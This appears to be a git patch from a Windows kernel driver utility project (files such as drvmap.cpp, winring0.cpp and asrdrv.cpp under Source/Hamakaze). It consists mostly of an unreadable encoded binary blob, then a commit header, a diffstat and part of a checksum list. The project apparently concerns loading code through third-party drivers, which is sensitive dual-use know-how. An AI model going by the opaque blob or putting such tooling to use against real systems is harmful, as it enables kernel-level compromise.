z1e5Fg+#BC>K1?z6u(~`}yE;h`#RE0l zcN$hZMp2mjB0|<0!PQc!D)i(2n)D_k^@``%Jhwk8(YNRgc>3e*!0R|n`Lo=i!JzCb zxu>{h^hku>B1LN(wuq%ZQQv&hW(sgU(edc(W#IcKMxBXRSajL?P`v2ugzA9t)uyat zp*t`Zm3ccF7C>ftzr4sUD%D_G4A?{Fb*CJs#AFS@v3He`*QdBIa>MmS$mxc%>CL6r zkj^rW9G4o|@1UK|7+Gm{cn`Hl6_)*#Vf6J=Kx0=|%b3X42Ag?6K?JEESzCFE(kJ(HxXS1*>MiMjavxXZIs4 zFi(pv9J#v|1kD&?xcHHMr8Wd{F$j`fWI4$WY;4^IMDWqodXiFI6eWc|2)b$}3Wsf9 zA*G?vfoAEvKjsszY}OGhz1wEn0uaKaQs09O^tm{aj)ic~IE;Ed@?qiybzUvxu_up~ za>`OhvN;fAd^}ZVyH{mE#e-;9T!Th7fMx`5>Ktlka>y8>A9kiOAqG%|qxghK)e7Y# zZCGB%-Pqe%du9@vywUI4PC!ffLDP!4S_@~gdCnmFob=xB)a@Nu-zR0I{oBQcf}GpZ6t@tJU8+hb6sbx%Z3F5{1=!qlMQ zLvix)mlyLgWhCT%+PKNAfuxBD7oDZ097F<%&SWa!SY0nc?BVM0lz8v-6!U8m`gY0~ zgR5Dfuesh2w9!9p-?@xKYd6D@H)q*;FdlGOmOjaK{QpA*7fv5mMla5UJ7-6i-_+cQxDKTn1srIiP-7qC+u(wmT^@Q;D7=XxqPAGVmH*! zwdXDOYT8X|lC&hZK4Eso)U_*_CBlyRK%mMN4CAr7*#!mkWUmu?vCzn5Xgn5YubJRg zCNmrU3fq5c>Y$GIruERcR7y6KN%N~_ zmrw{q2hTL^=k1K=WMf7uD@idjcM_0H@$SF}z ziom_kf7soG06@cz*&<*=Bn2xjxU@{C1u}p5=OCXLs_NeikP$o_CC>@heYedi;Y9IL z34h>j$VDVeMl(}I<;lL_aDA1Wu)o7(POfm^V$G&wca(@jxrz2GY6;1LiNa7TKrbnR z!pp?Lo43edg2vxtL9KJP}CGx6Cw~#Ja;HHxQl$#TII*8kh~eG$aC!^l-FgaPh-Sk zi=NLw2Dx3A79<5+$JIte$fZ_74w|wG+@89iBw?RU5c&Ml5*&n7a?Tw6kR_+5Ojvko zd|=pkh^;qMI6O3Qho^SYdIT-w9tTw)mX>C#s_-lpT2^&a@^P`fn6mv17%z6dr{D41 z!CG7iYg5Z71p!LL=C^NJXr>ZdU7p>gHp0C zRT;ipunL9=9v7{1+qCyEcP`BGXuhZljAU*h(J}5|ifm_cCVK<`pl`t43xt(sF(kR& zKPGg1!@zGw?{X2Eyx~Wa!#`c-zQYLTgXP4bZ2LFpuy&GIx4r8Y_=xe3BxdE!V-tsy zXkZ*pnUp12JjtzEfFLvI6@^mlCdp4spDZb^RbX11%xdORn3R zorA8_<>6=>3ap`$%4|iVyp4Eq|9JP*ygu)rm)bR3LriqM3=)9qT5i0!{(31W%L@)Z zcD^RCID(pzLQjQNae`)_(_J&h^Q2z;q{nwi@MN=@J>I4XH3`S4s$nZyQu_j*-Uom8 z5bO{mYGHQFrgjc7W}xz-5j{#ee#bXC_*c6U@c#xRa`{Kyhuk4UEq(5ow#20?2(!`s z&8B5?KmD+4%F`Nz)!Uw7gYQc8eC^WIy6tSTk$M;q0+#Xa#OHz@(r45_;o^mn+b15W z?iE+kIzNExy;_JCFfevfmEbLh7y^aD9vOz$OT-1*Nbr)0H!Vvwb~m~9PA7 zq}8KjLWWXYyODuZ|0TN02iss;##Llv5{3GV?Cx_iN{P>bKf3x}Ukn=<_ZZc> zkgYdGOe_jnB06sf5zlUum=r%xN! zTgl08SrEfV3G#$UHfG#zZwalHxs0XctrEW_0}WA#U05f|71p7Wgw5!~0Fh;v3h_uB zt^)=Ti?%E-i*|P^d|<6*l{hd&HNo@`MPy?CgI*fct2|b#4pXMav0)c{zokxEn?h=psXc$yoUVBk z>;W!msy8U90$nVCAJOmJg6SQ>ji0j}f}O7NX`z!NHd3sfoinL00-_iqTNZ&@oDmEz zv|F4lVCH>;zogFJ=xm)j`PRjJP|Z}75@MOC003DmLI_jyh)^8qx2?5V&s~QZ8uJKf z1-jAa(d=#fV&+-tNS{Jl)UV5<1j!$*qxVU-zu;m-tXU2>(3_FSJ!TtQjjp#{?~$a5 zde((A=1%09LWXyTb?9ioITo4LKV(T?zWA=cedLk`6^L|9$HfseTBx%{>wL#AbG>?R znvU3}>V+dp>*i1-Ps#n2nHB=IFPQ}K8mpvI^mT&i7bC0Eg_Sa|bpK5^XWy{hcS8=iiF<9M+joF5`T=t%V4o``}xP zCj;**2qo0TW}O$P^qYZ1b-{mQ^uIA|0H_-Aa3_%!hK%Z7V)NmjFKkJgv=*`xLZH~H zI(*tW8U{%DVgvG@aqdwI5igw>ft6tK1~7iWOm}2Pd6}G1 zvH74SM$elv8YcV6b}P9x!3$=Uath|cLA+*`m1M*gO*v-|Jk@7f8T)Np#i3Pe6uBoAT=bx&4tW`_j!ETALo)ON^UWI)< zh+KZ+$ygWz>M>!zPjhLB$MZ-5EFKgHAXp01;>trA6mWT=-~Y!~+TXmavI_D3Q~e?f zZyEfd$hbJh`Xjx!ZT7hRSseWyYPZ%&Q8)Pewe1Qpw1q#`3~_!(ZfJ7_z_wCwdLynB z1?=p1sl`oh2fZ^@rRzm?pTuJ-N41r;8uX~NZJa&pz6i`x3 zyO|A9OS;4lBfo|jcqaJX57aZRFK}H2)W&<2U_!xQ@UeG^+IRi}!v}s|h36m#C>(26 zlu30VLQ&}?Uv)vGW;Z@Oh8)(GJ3_x$%8as`1zl7ImNi~zs#X}M>xnEk5~YS>TC0%E zrL2R=wH42+0%da98Wc*JWQiKV707Qb0QcdkP%&hJZX8hzc5Bb#DP(tPJ#4)n9*lm8 z4C1eF&1%%t6|VhyhK6h8mH^i!1c92|X_=cIJ;7;GB-NZtkrQcFh)A5mUg227O+e0X z$?n!OGepx#rzonO4F=-i74iq$7a$siyAe}MjrsH+4Lfr~TDWT3Qt8v73E9@1j9*>T zVfoCG68R901;z*{W_^vFc*S~E{<-7TKz~E>=_wCjv7bNHbIaqOzVZJ46c^eSuE0R+ zpSkIPE=7SZvMtDOQBcg22VNMY=D1bM?gu>CN50yhXVJx2N~~Z`5}On+BoIj%+Dhbf zbby}*k+oZpX_@>bdBu?-Qlvx-k(B#{4_;m3CJG9e-FL&F1Eg-V@;)ic-&}Kj{8V_p z(_nSP{Q4mw=;vPN{k2h|UXwrF8=5=BgNu#PBgzjIQ+}iQ4P$wY- zGyP#S?eW0aZY;$|p=(xKGFb{zCZqcB5)(Y1= z9u+7Xk}ei$JK4BPl`)_|x033slqYGJ+7fyu{O8(PaXM)d3)DW*_R;}u5I=HU$=v?l zWebQ9{9}W5^)up@Gf%cySo&A}Iz#a4E5#)TB@D-z*KzM?WsPx5T#jbnYOmT)W!#-9 znpDlgrIKW~(2bmhH+li2y~Q3o35ta}GUnJgeujYdDKI?$?ZY!{MtaV(7Ia(%glNf} zJEBoJ)aOY^XqQz%c0=esDDgpQ^a%USdiq4DY(VqMID6_K-fKu8&KWLga&6!bZDd*`AdhQ;~9u0d^nyi!Q(dFUdNE zk%wm%|F;0t>b_`$G#g17W#NvK!hZ@R!MX>|qZ*Pbw`fOTkvL^^n;DY8M|2|odJ)b* zcE|D>SAaPjP!}+5dQs9;W*YJckn@xKJS~+T%An5Tl_m2q;zuwsY;y*o&TDOZtXh|@ zSuNG$lbzvx&NMY6&>Kq{dA@X~yInrAayPyfuod#~!#xut-Kb(Niv}p`X;Bh%&3vil z-61=el7#v)vCrHgMw4h}+S7hb+*!IC*L(RNyPRho2SttNORIQO$@obVMm5hP_5oyZ zlT%`$6G^lkVz}Wzn~vQEdWE0KY}m_hac^+_|8QItgpVG`1ugFpNH2Xj5$YHUHZ8lYyw!Yj8=?@E zI`^efPg6v*C7^?v0?mr|B1R=ESmVYnp7?lc=G`m$?GuAurB*tDeljHg`-{BfTn4zpEv|Gz<|C{OZpwjt7gR{_=AR(8~mO5lR)zN z=^9SmPWnLxV}D;?NC@J92uOxb;Eh)3P>u|>Z%^2A2 z5x-?>!v`+VNMYozSXzTnUc?(PJ;>5V5qOHL4dZ_4KCWvgE7F=~_hI`#-Q%hPUljEx zbt^&3NM2IT9P*Tx{a3s*&8z&1aO^@8K;Jl58q1VZWrdj^$cjwxF>V8XAKb%)^yQ4UPP|X?=*2de3 zah1s^Px{|@Ccx@Q$ipc3r&MSCJl(nJGAm*@GNmJz2##3s-201_B+vA)p)FR-nwSiJ z=e|dyIVe8h9HR;9_;o|pt6;(DJB)?fRWSh?%_jtEs;yB&1`r5TW8mI41qgF6ZSA&e z%pDNh`1n31nt+jxVe9vzwzwdEd@~D^&)_&luC1E+$NhOKQUAa7suoyN6!z(unlboZ zC{C^BBm7AGwHw{djdr0RV>9kH6;NC7wUnXQKVncki&lk#%A{c|axO(MTOuwUG-$S` z%I)5=OT4xzJrv4lPBE{v(eL?^{#oCMI!2?!%K^V0*K{R)ik^q!aO`GvDsXe#TxM}Z zXkYmXzvZp3>#-+)%V_1U4LN9ztVStD+N)3Dfipmz4)hkC&pg2xw1GaYz#=Bg9_|u_ z%Q1;T#L63&$x!(G@`i&K)N*bNz?(Zbruw;T!FVk887Vrk%_}1pv~h>wVmv2OPR22h z!F+VGx+J=j&KffM&set+Vkv_s3t26}{54{A9jIv0JC@N|Nn~p@A-E=o0wOWzg3be| z24+B!tcamE;*(<0%SNQCEmyel{+_uq2T5@2yEMa%7J@+UnZ9dJ4y<1aQvbPD!~6n% zoPzB|igm^%e?@E5P^6D9oUAQZK7qys{xtiJx}G;>+Z_ID7HB}e^kxeVl?po%%mKdS zFifvV$;DjNMh%L_7!t>GnNd7+!-RiwW*hE{6V&K2gQFk4MMWs?&RXvj^MO<0s6M;( z=u=fZ-Q}CcToOy&e^xxeRqEaReVDvzx-Ef3n;9``%4JjD6BsB5RE z_0E?8;R7{<@Y4Rs%eQNH-Xm^r5-69>UQ!*c{WS_*i?TT*oH8ZLc-}nceg!*SG*;0E zKZ+WxR$894os?bZTLI`_lh}&42 zXs-mVmcLr(Lh8c^=<@^@Z2gJMWEX9f7=CkuZ=Nha2S}b@!31Tx$jng< z%f4a;&a(}0FBKQcCHi0`3iaM*i#=>Wp&ChlU-IFGG2l?~`Z&4sN3dz!?)9j*C2i1Mvv^A)Ub*XCd~# zf|XP**`}&FJ+R-*U%hc2lw#Z=m{#gpVe9YW^|hopj}22CyY)LAN$&FTr+R!;kNb&2 zq(B+D6@iCgbZ}Qq~ zic0fb5NHWaUP*3I^AZFX&C>ZI_Ouw;?aQTR!jBwc1}%sPjQHVx$}ko^>*>tP#oKf z6%AI5?U3xN+SuDZNR7F1Nj6n4nO0ZwTQH}!KfGmPqZr1Qxe zr)@EA$OL^zQ1TCYnX7DU>^p-B))f*QP>Q-)Bmk9*JqkkCy~=FXI{hsgqun}Wew=o4 z?aHy+I2Ifxq#LAiKiM-?bp)dC2TT+3SqZ7Y!ZsqaEQ4z#5Nx;>jB4$)qkR0c{ue%n z>YzeiYI&a*r5ObCb(;qUxbX)2aO#6CKaQwf^*Rr&ZPFd@!ZE+$HKuXChCq-hT^^a) z${c7?!q1MgZh8d{>pK5b1IUryG~DLPmas|(9i2VG6cW!rh%GEq9NG^>kaEi4&2#&9WM$5*HCI1-OA>Y0@ zi+UL;&9U()Rd+Ev?39HBcGC$sd_^Y|drbX~aw-omOXU5(4f+%Ah42Ms6P8CLkbyyo`(-TW9foEWt4L2g1RTehYgt|U^1(XN8eL8vk#9G0r5q%0zo_J- zea)<-4a+@6FgQ;+EFh>IlB!`hrhN$EUPHsJG2D(>m{qe|d>jpxH$g*_cy&mrntD z=^BaKT}!UQlknW}%_^wn9S3hnaQ^z^7ggN+POCbidv#G2KoSD_aKLt3Q zUe9zL?CEg-QF)*h_ux(R(9XwQdnkviqrxIEd`F3RVdhy-;d$ptKx!3rPNdhnkEYNB z>r87>-VcenC<&~s5&d>mw*RJMx6?>4JU z=C$v42|UmkrYhnzQhOw`xlY#(S1!b%so#Rt9ORb?Sv8;DrbI(uT^$%4bQ5P5b&~6V z3jP|w4l>J7ddNAmC1?N;=%>=ncz_cQg5`8u-FP57HSK6-u@Ht<4N}Zd-a{2qB8|u$ z0myL`s!VCIWeu*hKrz_Sfs7yiuqA>5bCk`{b@V5OkbJy1zzx~$ZInBaIz`k11ig8xW_*_CoS+ul6yH6*F#!)T#I_a{EpB`@A7LbdD$zL z!k)GGJSlx9>Jh>)BVLis;t1By7*ATd#&y)l9symw7c83<1dP^WC5Fx#dLysqeVsD6 z{zC_~fMRP@nK?@@V*4q9TGheojHEXkVx{YqV{Zc*jr1r{nMj5vWB2Nfx#x!l{|;iu z#O^K3a7X;6Hxb0CW6JSs1*6PR#2A4>rVKwqk8$9cAaR9jHn61)-&Eod%NN=yQ&eP( zZgFoQ;Feom1M})saqdl5^N_2&zcG;MiZT;5cbYC(1;tM68X#P1b{@1OyAGLKoJC|C zX$=n|iHH9-HaDuv>L@!ZAz!K*)QXVYa}L>Kk*KyZMgf$?6*p}tWwSNudGyQ1mHSdi zq)Ds?888n*x9u>_+yO|V#HSh;-Q^L`E?~_%KLyy7e>By6#FTh%D-MGlRV~>q%ijAv zk&^Ke!^G2{E-$$S?}owOizy-aPI49XM6 zvG_qnnx1}>9s>#d_PO{Ew9q?0Agc@-(!QE7&IN?*=NQRbAVn!??aE4Z)gB9%$8wCE zpx%oOh9-^m++vxlYS&2BCceK}TOSNQ+zl8NagpNtbego6dZ$%;bylnsnUgYF)UEp$ zePBw&o{n6>QWPL4M-z=v003Cj&U~`1DZ5b(b+%S(XDCxx_%E&wm z@bCJotG>-?Fqm**d0R$7b_byMscrO5ekcpy?su^NB>VDe5r58~BREQj$$6IitCbCu z91oj{)AVVii=1J^iyBTG1Dfm&c?G|YV56jy;^$963d~ApDhAZMJlX9&Oa<-ryaB9K zhM`~l1HwuSxNk2)19hIaZZ)tXqx=dln|OgOm+7pqOO2d}r3H09Z8HF`;SNB}Ek%u# z?BIEM?}?>)cM8Rf8#q^7EnteR0!ucP*XE2>J&-|Yihk2e%0ZPY<&(}^%%O$*wh(0?;6G2f zb!U;41q!&Wt+q6bPN*cc(?BZjygmirz_8xG37T zhQA_invwp!BYbCigyH)2?ENqMJN6_w+->Ys99K)YiU692^K`@Ocx6O-+<~L3>ij9jAox{g?Yi=OIgGc)UOoppn^D1I_NKTv@O+CG zP2dSN5Yt*O=e$=|MxHwiPgWKLElbh{v?|V6t&)+Cv)EqBv+7CeWcwWv4 zY@6T>S!N-+F&KEXa0X?SVdkB$bvMpC3hL=A<$!se@RaId#9~kIS>nx?xOO+OPOrdS z<(`tsHDEe# zI2C-{0rVi2#tbT@5NeLV~8Sal#FKb(`*;JCG$G2J-+Do-z!xDf&@XX`&*=lpr zzifgSNUfD$S}2F=mBIbI-UR~lMEe92Is5M4`Bqe`O?@%5y||hq zWMyzVrn4TSsWXLLr571nhIxo`VSpPo z=TfXqJy-?t%M5AE>UK01^6mi7tL9Bfj@%iTBinN)i%Cqdd4>8T?^_06-7W(8S#llG zJD@ncv((sqgAIX)$<`k3nm}#SCKY6Hqv^i~G?X45pVE|HlY3xJ4G$fsRaJD}g7``u zQs1M3bUDkJ6`Rpj`Lqb;0`$5?{Iwr@y6Pj*7U|O7j`_YUQb(!9dwZ~Cu z_3y+Hu?uWL(@E@honq1dJHLXY+`?tR*^_ulP=_#`;xqy<9| zE#&P&T8~&$(ocq?yB23eKoUN3IETdaZ_7$$UW>Laz)?Ch>~Q(^&ECBdAzUUZSa~f6 zsNL>1l&+RXAD}r?qm7CxyjWR;JxuOoQ*87jDvFOj%tA?-`*W|`*Nl^U@-JErwjAZi$-_+8Y2q3)A;9?$G27OIAo>7{{Ql@=D zHPxug8RsrdYKoIV!>=Ji?E(~u0JRVAg&^8fCs6A%cCc;$C>TBoq%3N+8t$N8jR%yfHY9H z-8AsRd99v2>CQ-^{3-pl>TTBH#+XA6b-EmZd5UGix=`+S)n{<%x5yyksBn zEb;9Ul}OUQ@&E?RY+>RlYnWW*B2nF~+swW~S>ln^P^%GG17tPI`REq`fyh`2-qVk$ z#Ia7g2DwA?xAU46^U#~y0h~OC>@R(R^|%9tdfKh8`B5r<9wHp-eu8W9vCW~C8ECue zy;0eZ%um9&8aO?N{VU!qZTDJGL-xWRF-FztjS5Ex1}X2cLdhQJ=%oQRR@|?rCW%!` z#p6|^A#^XTk>;xyRaw_g{e zHeg>BP|!DQ2zRo1VK7pxYD$Zr8RGGfaCN@?DyR69ZDs{W=ilojCCUq2;;ft-r2U&n z9J9qws5CX^&HcOf%}}fGwZ{_Aos7M>*IEI?HjNf_bPJd5hms73!U&epz|G{kWe-7F z{u_k%wIbASxXWaTvo;#yjhZW({Y+QaTa(>CryBtU@;h_QY-QtF#mzo&M!)Ll3{#)e)z0Vvma$(opQ#He*^ zh3E4b_FSs+ZUOI>^(ZmAI1u7X>w`T35`f)@=hnV?UPY0(0PpXrk>IDhRzlgNG!+Ly z3L$ie!=;->+vmTz=K_Du-XDrTZ_AhYS{2F8*I51d$-y^WjK^Xvu*|lCfsD1sN$Swt zEzL2aT8|rYAPg|&Ywaa!cL?Av{=6wmb<7v5TZmun#^$yeL5Gu!ng!#v7REV-h4;3 zSw;wS_#;J^?EPYTy*Ep91O>NLQIir1oEd2ti&pw)Ua+dRYf=p5_7Ra zsB;g6b~c7J6Y|e!uw07vagSek+1}wjnZ?)do@cp}adjoT|Yl{uDz%m!GUzYD2Ee ztmwgE9^raLT%hD-yX|9-`<0qq)&8n_hk|g7Hv`j1Z`GAR)LD0wu;^%tTFs@1(qU?L zvVTr$iN2Ko5|Vk>BrjuAQ!hfCP+U)bjJQuIF7zm_G8ZBh912qpyUk@XUDap7hsbfd zk&Jvaq_^l|37ZH}49A$RBNvS2D2*on6^Tts$HJ#h%p;64D|m3i?b7RBj9xRQ1wDIa zE1&ipEq2r6XLnDWsb6N}l9u2=rDGhT`UzR1Psnh&FUi}C=GKs3{S1ps*Z%sk<+Ku> zKzxckUFA`QK8hpE$!AbUb!w-#E4cQ<;2K=~E>Cv-6!H!^RNj!KsucTp;fly5d76s{5n+Hfz)Vlc+prUE^!J1b43P~1yf;HB$+(diO2@~gIZufTakZley?=szW-%jo?^$^6}T z!xDRB5TTAdN-@(6(eiy3B=A~xdA9z25~{8P+AK_YixI+s9UHlikEZQh8^T~(CBhi%A-iA z+OK~+=L!wXVl!n2 zJ^?VGhp zRWFu0b`3bgRSSo!qMZ-HElB5S)L_F}Mmn~$;2%KD@Bvz3p-vi3q zHeGSDz|pEg2w=`Wk5Sm~Lc7y1%sF_A&0)W7hG5*Va6Jj^mEbU#}kIWUC*oC>I!( zyoeBRXxBmBt5uAHeC$th_pd+KlU(W@#?Qgo;K5C&QGavYX-V>dcKiR-V*aaVuE*SD z$MTWCpbA~7{zWUMKLi>do+@?3SJ!IvX@r~5tYi16*WYc!gzLXL9u*P`kulQ2-t!ce zteLUqtiq_jlckscx3^6!C`k29@f8?l3WN)B7UglUtN+tbF28$gsnarSo0SA09sSU1 zNZh?&8MbiS7_{jkTfgFReSS4{#zv$8@K^M6G;*sfp8c3Cm~3_)1H4(??j+iFIn_{C z>WWBg-S_^i?*KY$=ZZPcRAXBZ0YjA#7cD>BZ5}`XJgp)0J3)v>&^_71zaUCo zyO2S?<9#PiQ!?Ni=dLtKgVSO_T98RZOzO0rk;jK*EmszkIM!BPf@?! zM;xO>_!&BA&Y{B6_l}!25pqsEo|@NITuvK?9#*h7vc1b1fqw!0jJ_Rs`xxY95Mqo} zDM^1!y(!zR_Qgcxk_Wv-*i*9ofvkF#q{x^IfPf}I4FXLcn|=Mb5UHE{yiO>y5bDT# z7EH!K=V+0D;Jjg`Oq1{M%S}|-h8+AY4uzzAjzO^_0~LZpLZHHB?>%G_d`2jP5(DuQ z2+ueIi#*A>!R2dpT4lE7^n}Z|rgAli>}wmmx$?!>sfg*r9xc3yx(4Xi*xul`l;LDnW65BmMj=qFtfO-N1O;2V z5c;nkz>!Paa`22x95(B*3$1fw!7gX(S2%0i^u5IeV9jj@2|cAH`&1Kh7`Sn$V8?TiE?FT-HimkFXFXyTDVyKMZtYeE!n}R5#sw+P zO2NXT;@R#!Z8P!m=uMswWRZWBh5_=b*!ugd<9!c>t>5F<7Y)m4iD@k(;Mkq8?1u`& ztrs#R$o9TyCy7+h)*9Cbr;k;26_c|RZ7{vH&T!7wY>+4b&aN2uUH0wVIC!W4D5e{C zuIPW+aV@i1bqaOQgIqeL*51Y-!zyI#*8g8s)T>Qmz~a$usaflVn|ZjkH-8XL$Zd-r zz-HarT+GN{QqARO3@NXNqSYu{-E;kuk zI*fw%h~EmfA(QoUx$e&|+6E2S?%fPx8>|B}2<*K1%Zo^2?PbG)YwYsXa^9n=n72XB zAFneYW@&vKjZsz!^WZ@^_`q+^72A}aczeM#A2;ZY7{8W2;-2DZSblB_Ptbk$E;p-> z~*-8u=+-dWtE+7=1I}fR6%OmeL_%iWUI9xS+=^F@9_oUHLXSxe`O3xcB+nms*YLxq~%+zU8Ra1cMXi_dRVF1&eXa|NnF3fDTQ)HflOJ_uy zNi`OWK+ZMwAg^*Lxv+yOEfg)s5RJxNJD1qWx{k%nt8Xx-ssW~OD4M{1q(|b4qhLp- zZVdDm^YZIJwqZVCCo-{W&ppamHN-5qmv3mAliiYvRb-TIarWcY9%g;oi_1Dba)HH_ zL=^HHGJI1;#NqLB95wFrOT(UPi#qFG$tG=Fvl#&$)gom|5F;)zbdH{8!fH5L@K0zk zh(AZ(u9ili^c(`6^$9)EXEA)UI{UpH&Yv=HRHr{1L7S^|y#@vTuy#7OGz)8&OY$non)&g=Dp4c-mKJemu5=X!TJ2Xet=Q_+qI& zlPVS^A&i+$1aBXoi^D^Ng6Q8Cho+f57V}W4W@y>GSz*(nc6^1A%Ug9@D8Opj&*di!UZ=X` zLWB>N#E7ml0SXA7R8ljm$4Loqqw8yBDiQ_9E7FB2nsXDFfDvJ8idhPmIcj%xvKowY zje^rGR48GB!S!tWZpzEqq@vf&rv&vdLqDN>)DEr_Y=fQFr5~9(T5B{??HV&3j{n{d zuzA90rVcA42{W0S^8B@vW7*}1LZ0_)UR$|NssP&!qRQQ+dX2uk!JiqoYt1)#66VSR zz)?5h*Y;IR_{UMpuXH?C>*P$9W(9cQKG2%#+utZ?5&u9yi*t%PifC_Wx@hMJH0g<& z57NZi=)sU{fLR1{xL^Vm4L*OO?5BD6?4;;@!f^OV%#>jZa%fibeB)wFwDl4OsSP<{ zeA{)wG@EfaMb{CqcM-k6U<0737T=fB{IRM(pE@>W&Lx(_V0F0e=dmMJDn0*88Qke~ za7G<6jw0=6$t30cYS<^CCZsm0pR#sg6WHKVqt&g7=KlR9 zF+1Ucr8UnM-tKP9xSe4u{_bjmXyBi$hdbF~1rd7{p>bJl8UNJ7<0N)-$YFtoB21>> z;){{ZweK`u{bw=8WMy>>Gd_@P+`8Je!C;3BYL}s|M5nf~Gl|zF^iFDySbZA|3Ov^9 zqzVT6?QDfq^&Bj;6Oo0AGz4H|v8b-Y0cZ@D^Y5g(+iWFYjR&?}MZg+6XHew!s`dZK zNaD^muO9Da0J-8m3BWW`!NPlRZ&pDAf%KPv7n`zatQDhY9qT*X?rGHzSWT&>{)-K= z9cJtXR5$p-M!s&7!}Q*MFe(V`emvs)6I``vay(7(0I|9yg^57AI z-qTDyP^CDyL{#=dzQ=i>waDh4-!#+MMzT)Eu5ifllI(e0R+vp=@$8k1oKaUmFji9W z&*3jw$0=(xXCSOVK?9pf-WvKSNnAX8No;&r1k97&v!x@c%i9N?6!aNXwsde^#`PUF zVSA8WQRmPiVf%RyuqrnC$@DVSXMbR+e$28^P_}+yz9s+c+zPeoE+)jzcsm#~hB-iy zpCA2Vex9Jv9&%~ghvEu{)(w#}4{~g2mEFbNj~}M6KVWx;divxggttCvT5V^Xhi#jJ zMK#1nU(%q4Cwz#lbq8LnyV|najmy}u+1>ucEcP+%1I2fEe{W2}moUiV0v!+w3SXlC zlRzeITfT3nXhuROS3W;;67JUJUwc_UgNogH&%d}L()Iq(AG`X2P$TRU4CSQsLZYI8g$ajt`W;)h$;AtcaTu z0<)}M(SQh07tgr{N;Mm>5WZ<49%u}PTt5W-!WboD=>%)k{IQK3ucPeXDgP%vXEqoC;#^P{GrvD}PE@`g6lVHczT8M_;w?Ukl_$=$G`BX= zVmt*Cp@yg`r?W4d#)O?^eg%)DFV739;zkBY5N4lSMr300OZ;yKJ6&aDknwo(wGB7(TyI+)9BMeUuJ;2R-KY% z=A#(ltpQ$$XalHbjJ?qp#e2WYpTwRWabU#jdVh|W&IWNRhJZgN%j|Zzr0l5^x)KvJ z)8ilEy)LRm+l{;L1J)1lX?mH{TnQW*fNgM4--#l$tP2dLrn)_@OltFB^2)f^{n;YX zd8T8pJ_n=GeM-#A1o5Su@HBppn?vw}C=`4I%=L$|`!?doayQZHfphG>Tla&@#Vl)) zlWm!Nh+ELb1A5e*n+VeIqxXxg`yuDzxpDo;;&|x{V&wudUI&Aj&Jpm^WH|PwfArj=mAb)*Z?Hkj7X;KDQ}$^ zq0rg~a?>mRZ`4_##>*cOZ-IPU2m`8x)e+B#a9G)_W%>sSFoZCw#9zefrd;#Kd-dF$ z-OX{$!8?(NET#7Lr-On%#V_INevvQ}hpBRJ{c}}mAM6u>w^S;|*N^t7tWFZ(tTi%L z*~f%d!c)6)h184?I6ZUCsyo=qn6E)BI*jk-vH)}VgtKq7%)`J5#^lu|2fVqi1P77q zNHJ*fss?d;UMx*u)7V5>Q}5<{1whk;Kxbzi*%l`L-H@Ed5Pc!->qdRFzL%Nua7H11 zcXOb&qGjMj3plro!w|=^sI-CGb0r>W8hO7LB$9MySNwj$mBYe9h_aZ;OVmg+)NAi7 z?~QS2*+JL-(m3gPc^?!N{$40)`aXaH0*G+%bqw|%wGd_EL%QSYmWn5 zE>ii|d!4jL7I^&e#+;X#C9w43N<;sUk&v5|iKLGr*q45r^PEQRpS2O}gI^9GFy)iVDA6YFY zIPaBA=FrS(f0gQxxaBCFxo*<3GYE!GtVIjC!(_ZHH)TTtLtZZEWG$Zb4JB>w#S}5^ zS+UUhT`Bonn6nQSb+cRPk@xl!4Tfhs#%`deTo{TbUO}Whi$DNVEu#DOjS@v70Krp;q{eyOBw{Yg0C@{ve>O&0h~y4|3v~*1KCJ$o zRp*^Np2d*Xq-ib&;;3cP)My|SQ){`2TwCz^Z!kc;J-vv>s;SvQTziub;>Me?#9WKr zRi&Hp&5>_&ksRgBXXGGd8XFe#)P)*!1=7sgEplo#v1|h-#^X4n#^H^nSXhQO?J_Mr zyVV5b>fdkoKCkAFJ-@sd^tl9bUD_TeeWpS4Z7H}hRzbBisjoSBNnoU+x6w_NnrniR z85WOrV-*t-Y)tEc4=Anr=PfS{Z$FOG70?o;O_ALfQ}0k^ZxSoZt)3iFU{A6Tv2^nr zQP2P%`=>x=SWEof?VU*yPlkpl8}?Hp686UIe|^^}xdat^#RvT7lRmuH^|~HWbD`@= zKIw4t_Ma9@Cp{cEf)erbwXQCUjW^(AhjT^W7Alt-=UgTkQ?fuV9>x@f9$WOUL6>Xa z@lZ%|b|18OvA*N~YVEww98C}HU1;`mb@$yx>9B5|0J2cwW8_ zIOyGWi|Lvx-mV77(!0V?0vp;i0(UB5_!L^!TheIRBJSGG0sHCLrAd6`x|gx+Uoa(L zh^rM0a|5?e4rvRyr<6{6lta7mIkmiU10O_q1um}Xwiy$&tVxpgYN6BeXcqW~8mi{z zr_OJn_sjUm7tGMVH&f<%=*|>r`P43r4_Ks#4@6RrLsr+kHv!?#Bv!(C)0SO`3@!9r zJ|bTc;s&CV%7}r3ZB}`Go}$~SFc|4qBz~-*0}hOnldt|ld>5fOm-%@o(`k~9c$-C2 zz&{O}*%l0a6V|aTK&&o`Oehl`Pb_-uW(QW zr1Lwm_?xeAjg`oTqwhaZS3^`y_;zjTQMbHBl;kMqzimy1%>kKOG2IeF!YZ9@k}K$p z%u<=fRN>o!lUoMmmoE5PS)26WTA^GTKH~>R;3Mbiq4Ax&lNfeN_-_=($``?AyTePa zJAOrJio_PCW#JjXcr>RRlo427A9exst3TG(8VK_}h6Z!h(x2pK$0g~_A`A1f6P}|5 z;D^TCN*0Xg!7(LhU^(Ev5Z>Eltdup>lY?fN+)h%o=|&!@@j*TODqCg)w@{O~7`o~> zrxfy_-apuu*uz8AN>{DGfEZStPK~V2jxDnd5B9nCgN~@KsINuK;z%?u>Bz&UWyZ|M;G>eOSO&_USRjU@}qn}n%_Dgk+aXL^&^ zSAm9DG Date: Fri, 24 Mar 2023 19:38:12 +0700 Subject: [PATCH 2/2] v 1.3.0 Internal rearrange --- KDU.sha256 | 10 ++-- Source/Hamakaze/drvmap.cpp | 16 ++---- Source/Hamakaze/idrv/asrdrv.cpp | 2 +- Source/Hamakaze/idrv/winring0.cpp | 2 +- Source/Hamakaze/kduprov.cpp | 81 +++++++++++++++++++++++++------ Source/Hamakaze/tests.cpp | 39 +++++++++------ 6 files changed, 102 insertions(+), 48 deletions(-) diff --git a/KDU.sha256 b/KDU.sha256 index a111522..2c53d1f 100644 --- a/KDU.sha256 +++ b/KDU.sha256 @@ -26,7 +26,7 @@ f12057a99c6b20abf6d9c3df949d794b124ca19b189498ce2beaa5beeb2b077c *Source\Hamakaz 09fa3cdaa1416b81ba5ee304cf24897726902b9d33a76d879f604b7fe26b4dcc *Source\Hamakaze\compress.h 09970cfcb9bfb7a8964ae4ec48fd15c1805e93ea81c858de2793691eefda3881 *Source\Hamakaze\diag.cpp 